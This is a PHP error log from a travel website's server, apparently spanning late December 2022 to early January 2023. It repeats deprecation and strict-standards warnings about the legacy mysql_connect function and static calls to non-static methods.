[22-Dec-2022 04:43:19 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:19 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:43:19 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:25 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:43:25 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:25 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:25 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:25 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:43:25 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:31 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:43:31 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:31 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:31 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:31 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:43:31 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:35 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:43:35 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:35 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:35 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:35 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:43:35 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:43 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:43:43 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:43 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:43 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:43 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:43:43 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:48 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:43:48 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:48 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:48 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:48 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:43:48 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:54 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:43:54 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:54 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:54 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:54 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:43:54 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:05 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:44:05 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:05 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:05 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:05 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:44:05 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:14 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:44:14 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:14 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:14 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:14 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:44:14 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:18 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:44:18 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:18 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:18 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:18 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:44:18 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:22 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:44:22 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:22 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:22 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:22 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:44:22 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:26 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:44:26 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:26 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:26 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:26 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:44:26 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:30 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:44:30 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:30 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:30 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:30 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:44:30 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:34 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:44:34 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:34 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:34 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:34 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:44:34 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:39 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:44:39 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:39 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:39 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:39 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:44:39 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:43 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:44:43 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:43 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:43 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:43 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:44:43 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:49 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:44:49 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:49 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:49 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:49 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:44:49 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:54 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:44:54 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:54 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:54 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:54 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:44:54 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:59 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:44:59 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:59 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:59 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:44:59 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:44:59 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:45:04 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:45:04 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:45:04 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:45:04 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:45:04 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:45:04 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:45:09 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:45:09 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:45:09 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:45:09 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:45:09 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:45:09 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 22:59:19 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 22:59:19 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 22:59:24 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 22:59:24 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 23:00:19 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 23:00:19 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 23:00:21 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 23:00:21 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 23:01:30 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 23:01:30 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 23:01:30 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 23:01:30 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 23:01:30 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 23:01:30 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 23:01:35 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 23:01:35 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 23:01:35 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 23:01:35 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 23:01:35 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 23:01:35 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 00:26:50 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[02-Jan-2023 00:26:50 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 00:26:50 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 00:26:50 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 00:26:50 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[02-Jan-2023 00:26:50 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 00:27:06 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
